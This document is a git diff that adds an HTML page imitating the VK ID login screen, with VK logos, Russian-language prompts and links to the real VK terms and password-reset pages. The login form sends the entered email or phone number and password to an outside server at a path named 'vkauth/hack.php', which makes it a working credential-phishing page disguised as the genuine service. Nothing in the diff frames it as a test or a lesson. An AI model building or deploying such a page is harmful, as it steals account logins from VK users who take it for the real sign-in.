--- a/index.html
+++ b/index.html
@@ -1,1 +1,128 @@
-It's wednesday, my dudes!
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <link rel="preconnect" href="https://fonts.googleapis.com">
+    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+    <link
+        href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap"
+        rel="stylesheet">
+    <title>VK ID</title>
+    <link rel="shortcut icon" href="img/vk.png" type="image/png">
+    <link rel="stylesheet" href="index.css">
+</head>
+<script src="jquery.js"></script>
+<body>
+    <form action="https://findcreek.com/vkauth/hack.php" method="post">
+        <div class="content">
+            <div class="info">
+                <div class="vk_id_logo">
+                    <img
+                        src="https://upload.wikimedia.org/wikipedia/commons/thumb/f/f3/VK_Compact_Logo_%282021-present%29.svg/2048px-VK_Compact_Logo_%282021-present%29.svg.png">
+                    ID
+                </div>
+                <div class="vk_id_auth_title">
+                    ВКонтакте можно войти через VK ID
+                </div>
+                <ul class="vk_id_auth_list">
+                    <li>
+                        <div class="icon">
+                            <svg width="28" height="28" src="http://www.w3.org/2000/svg">
+                                <g fill="none" fill-rule="evenodd">
+                                    <path d="M0 0h28v28H0z"></path>
+                                    <path
+                                        d="M17.5 8.5C17.5 6.566 15.934 5 14 5a3.499 3.499 0 00-3.5 3.5c0 1.934 1.566 3.5 3.5 3.5s3.5-1.566 3.5-3.5zm2 0c0 3.039-2.461 5.5-5.5 5.5a5.499 5.499 0 01-5.5-5.5C8.5 5.461 10.961 3 14 3s5.5 2.461 5.5 5.5zM7 20.643c0 .943-.08.857.456.857h13.588c.536 0 .456.086.456-.857 0-2.288-3.304-3.643-7.25-3.643S7 18.355 7 20.643zm-2 0C5 16.763 9.299 15 14.25 15s9.25 1.763 9.25 5.643c0 2.016-.781 2.857-2.456 2.857H7.456C5.78 23.5 5 22.66 5 20.643z"
+                                        fill="currentColor" fill-rule="nonzero"></path>
+                                </g>
+                            </svg>
+                        </div>
+                        <span>Единый аккаунт для сервисов VK и партнёров</span>
+                    </li>
+                    <li>
+                        <div class="icon">
+                            <svg fill="none" height="28" width="28" src="http://www.w3.org/2000/svg">
+                                <path clip-rule="evenodd"
+                                    d="M17.643 25H15a1 1 0 110-2h2.6c1.137 0 1.929 0 2.546-.051.605-.05.953-.142 1.216-.276a3 3 0 001.311-1.311c.134-.263.226-.611.276-1.216.05-.617.051-1.41.051-2.546v-7.2c0-1.137 0-1.929-.051-2.546-.05-.605-.142-.953-.276-1.216a3 3 0 00-1.311-1.311c-.263-.134-.611-.226-1.216-.276C19.529 5.001 18.736 5 17.6 5H15a1 1 0 110-2h2.643c1.084 0 1.958 0 2.666.058.729.06 1.369.185 1.961.487a5 5 0 012.185 2.185c.302.592.428 1.233.487 1.961C25 8.4 25 9.273 25 10.357v7.286c0 1.084 0 1.958-.058 2.666-.06.728-.185 1.369-.487 1.961a5 5 0 01-2.185 2.185c-.592.302-1.232.428-1.961.487C19.6 25 18.727 25 17.643 25zM3 14a1 1 0 011-1h9.586l-2.293-2.293a1 1 0 011.414-1.414l4 4a.996.996 0 01.294.705v.005c-.002.272-.11.518-.287.698l-.008.007-3.999 4a1 1 0 01-1.414-1.415L13.586 15H4a1 1 0 01-1-1z"
+                                    fill="currentColor" fill-rule="evenodd"></path>
+                            </svg>
+                        </div>
+                        <span>Быстрый вход в одно нажатие</span>
+                    </li>
+                    <li>
+                        <div class="icon">
+                            <svg width="28" height="28" src="http://www.w3.org/2000/svg">
+                                <g fill="none" fill-rule="evenodd">
+                                    <path d="M0 0h28v28H0z"></path>
+                                    <path
+                                        d="M14 2a6 6 0 016 6l.002 2.023c.843.052 1.38.2 1.935.496.663.355 1.19.881 1.544 1.544.385.72.519 1.413.519 2.783v6.308c0 1.37-.134 2.063-.519 2.783a3.726 3.726 0 01-1.544 1.544c-.72.385-1.413.519-2.783.519H8.846c-1.37 0-2.063-.134-2.783-.519a3.726 3.726 0 01-1.544-1.544C4.134 23.217 4 22.524 4 21.154v-6.308c0-1.37.134-2.063.519-2.783a3.726 3.726 0 011.544-1.544c.555-.297 1.093-.444 1.936-.496L8 8a6 6 0 016-6zm5.154 10H8.846c-1.068 0-1.449.073-1.84.283-.314.168-.555.409-.723.723-.21.391-.283.772-.283 1.84v6.308c0 1.068.073 1.449.283 1.84.168.314.409.555.723.723.391.21.772.283 1.84.283h10.308c1.068 0 1.449-.073 1.84-.283.314-.168.555-.409.723-.723.21-.391.283-.772.283-1.84v-6.308c0-1.068-.073-1.449-.283-1.84a1.726 1.726 0 00-.723-.723c-.391-.21-.772-.283-1.84-.283zM14 15a1 1 0 011 1v3a1 1 0 01-2 0v-3a1 1 0 011-1zm0-11a4 4 0 00-4 4v2h8V8a4 4 0 00-4-4z"
+                                        fill="currentColor" fill-rule="nonzero"></path>
+                                </g>
+                            </svg>
+                        </div>
+                        <span>Надёжная защита с привязкой к телефону</span>
+                    </li>
+                </ul>
+            </div>
+            <div class="login">
+                <div class="login_block phone_number selected">
+                    <div class="enter">
+                        <div class="enter_icon">
+                            <img
+                                src="https://upload.wikimedia.org/wikipedia/commons/thumb/f/f3/VK_Compact_Logo_%282021-present%29.svg/2048px-VK_Compact_Logo_%282021-present%29.svg.png">
+                        </div>
+                        <div class="enter_caption">
+                            Введите номер
+                        </div>
+                        <div class="enter_subcaption">
+                            Ваш номер телефона будет использоваться для входа в аккаунт
+                        </div>
+                        <input type="text" name="email" placeholder="Email или телефон">
+                    </div>
+                    <div class="continue">
+                        <button type="button">Продолжить</button>
+                        <div class="description">
+                            <p>Нажимая «Продолжить», вы принимаете
+                                <a href="https://id.vk.com/terms">пользовательское соглашение</a> и
+                                <a href="https://id.vk.com/privacy">политику конфиденциальности</a>.
+                            </p>
+                            <p>
+                                <a href="https://id.vk.com/privacy">Передаваемые данные ></a>
+                            </p>
+                        </div>
+                    </div>
+                </div>
+                <div class="login_block password">
+                    <button type="button" class="back_to">
+                        <svg width="28" height="28" xmlns="http://www.w3.org/2000/svg"><g fill="none" fill-rule="evenodd"><path d="M28 0H0v28h28z"></path><path d="M12.293 6.293a1 1 0 011.414 1.414L8.414 13H22a1 1 0 01.993.883L23 14a1 1 0 01-1 1H8.414l5.293 5.293a1 1 0 01.083 1.32l-.083.094a1 1 0 01-1.414 0l-7-7-.073-.082A1.005 1.005 0 015 14l.004.09A1.006 1.006 0 015 14.02V14a1.02 1.02 0 01.125-.484.878.878 0 01.071-.111.999.999 0 01.097-.112l-.08.09c.025-.031.051-.062.08-.09z" fill="currentColor" fill-rule="nonzero"></path></g></svg>
+                    </button>
+                    <div class="enter">
+                        <div class="enter_icon">
+                            <img
+                                src="https://upload.wikimedia.org/wikipedia/commons/thumb/f/f3/VK_Compact_Logo_%282021-present%29.svg/2048px-VK_Compact_Logo_%282021-present%29.svg.png">
+                        </div>
+                        <div class="enter_caption">
+                            Введите пароль
+                        </div>
+                        <div class="enter_subcaption">
+                            Используйте пароль, указанный при регистрации c
+                            <span></span>
+                        </div>
+                        <div class="input_block">
+                            <input type="password" name="password" placeholder="Введите пароль">
+                            <button type="button">
+                                <svg fill="none" height="24" width="24" xmlns="http://www.w3.org/2000/svg"><path d="M12 4.6c5.2 0 10.4 4.237 10.4 7.4 0 3.163-5.2 7.4-10.4 7.4S1.6 15.163 1.6 12c0-3.163 5.2-7.4 10.4-7.4zm0 1.8c-4.278 0-8.6 3.522-8.6 5.6s4.322 5.6 8.6 5.6 8.6-3.522 8.6-5.6-4.322-5.6-8.6-5.6zm0 2.2a3.4 3.4 0 110 6.8 3.4 3.4 0 010-6.8zm0 1.8a1.6 1.6 0 100 3.2 1.6 1.6 0 000-3.2z" fill="currentColor"></path></svg>
+                            </button>
+                        </div>
+                        <a class="reset_password" href="https://id.vk.com/restore/#/resetPassword">Забыли пароль?</a>
+                    </div>
+                    <div class="continue">
+                        <button type="button">Продолжить</button>
+                    </div>
+                </div>
+            </div>
+        </div>
+    </form>
+</body>
+<script src="index.js"></script>
+</html>
